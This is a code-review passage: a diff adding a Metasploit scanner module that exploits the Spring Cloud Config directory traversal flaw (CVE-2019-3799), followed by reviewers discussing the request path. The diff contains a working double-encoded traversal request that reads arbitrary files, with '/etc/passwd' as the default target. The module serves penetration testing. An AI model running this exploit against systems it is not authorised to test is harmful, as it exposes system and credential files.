modules/auxiliary/scanner/http/springcloud_traversal.rb

```diff
@@ -0,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Spring Cloud Config Server Directory Traversal',
+      'Description' => %q{
+        This module exploits an unauthenticated directory traversal vulnerability
+        which exists in spring cloud config, versions 2.1.x prior to 2.1.2,
+        versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which is
+        listening by default on port 8888.
+      },
+      'References'  =>
+        [
+          ['CVE', '2019-3799'],
+          ['URL', 'https://pivotal.io/security/cve-2019-3799']
+        ],
+      'Author'      =>
+        [
+          'Vern', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'DisclosureDate' => 'Apr 17 2019',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8888),
+        OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
+      ])
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "..%252F" * datastore['DEPTH'] << filename
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => "/foo/default/master/#{traversal}"
```

Comment:
Is `foo` important? Can it be randomized?

Reply:
I don't believe either of the first two parts of the path matter.  In my testing these can be anything.

Reply:
I found it to be default after the installation.
https://github.com/spring-cloud/spring-cloud-config#QuickStart

Reply:
I tested with `docker run -it -p 8888:8888 -e SPRING_CLOUD_CONFIG_SERVER_GIT_URI=https://github.com/spring-cloud-samples/config-repo hyness/spring-cloud-config-server:2.1.1.RELEASE`.  The second part is the profile which does default to `default` in my testing too but its value does not seem to matter.  That could be a side effect of how I'm testing.